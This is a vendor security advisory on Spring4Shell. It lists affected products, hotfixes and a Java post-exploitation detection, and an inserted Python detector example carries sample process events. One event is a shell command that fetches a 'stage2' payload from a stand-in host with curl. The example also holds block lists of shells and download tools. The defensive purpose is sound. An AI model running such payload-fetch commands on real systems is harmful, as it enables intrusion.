The following products are affected by the Spring4Shell vulnerability:
- Policy Manager Windows/Linux 15.x
- Policy Manager Proxy Windows/Linux 15.x
- Elements Connector
We have released hotfixes to address this vulnerability:
Regarding detections for the vulnerability, the current status as of 4.4.2022 is:
Endpoint Protection Products (Elements Endpoint Protection, Business Suite Client Security, and Server Security)
We already have a generic DeepGuard detection, Exploit: W32/JavaLaunch.A!DeepGuard, which blocks suspicious processes started by a Java application, especially commands that try to download a next-stage payload. We created it for the log4j vulnerabilities in 12/2021, but it should work for any RCE exploit in Java processes.
To clarify, this DeepGuard detection does not detect RCE exploits themselves; it is meant to block suspicious "post-exploitation" activity, i.e. it is a detection for remote command execution.
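The kind of post-exploitation check described above can be sketched over process-creation events. This is an added example, not DeepGuard's logic or any code from the vendor; the event fields (`parent`, `image`, `cmdline`), the name lists and the sample events are assumptions constructed for illustration.

```python
import ntpath
import re

# Assumed (illustrative) name lists; not taken from the DeepGuard detection.
JAVA_PARENTS = {"java", "java.exe", "javaw.exe"}
SHELLS = {"sh", "bash", "cmd.exe", "powershell.exe"}
DOWNLOADERS = {"curl", "curl.exe", "wget", "certutil.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample process-creation events (hypothetical field names).
SAMPLE_EVENTS = [
    {"parent": "/usr/lib/jvm/java-11/bin/java", "image": "/bin/sh",
     "cmdline": '/bin/sh -c "curl -s http://example.invalid/stage2 -o /tmp/s"'},
    {"parent": r"C:\Program Files\Java\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"parent": "/usr/lib/jvm/java-11/bin/java", "image": "/usr/bin/java",
     "cmdline": "java -jar worker.jar"},
    {"parent": "/usr/sbin/sshd", "image": "/usr/bin/curl",
     "cmdline": "curl https://example.invalid/"},
]


def base(path):
    """Lower-cased file name; ntpath accepts both slash styles."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return 'block', 'suspicious' or 'allow' for one process-creation event."""
    if base(event["parent"]) not in JAVA_PARENTS:
        return "allow"  # only children of a Java process are in scope
    child = base(event["image"])
    tokens = {base(t) for t in re.split(r"[\s\"'|;&]+", event["cmdline"]) if t}
    fetches = child in DOWNLOADERS or bool(tokens & DOWNLOADERS)
    if fetches or (child in SHELLS and URL_RE.search(event["cmdline"])):
        return "block"  # looks like a next-stage download
    if child in SHELLS:
        return "suspicious"  # Java spawning a shell is unusual; flag for review
    return "allow"


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev), "<-", ev["cmdline"])
```

Because the check keys on what the Java process launches rather than on the request that triggered it, it fires the same way regardless of which Java RCE vulnerability was used.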
Elements Vulnerability Management
Detection coverage for CVE-2022-22965 is now available in the EVM portal.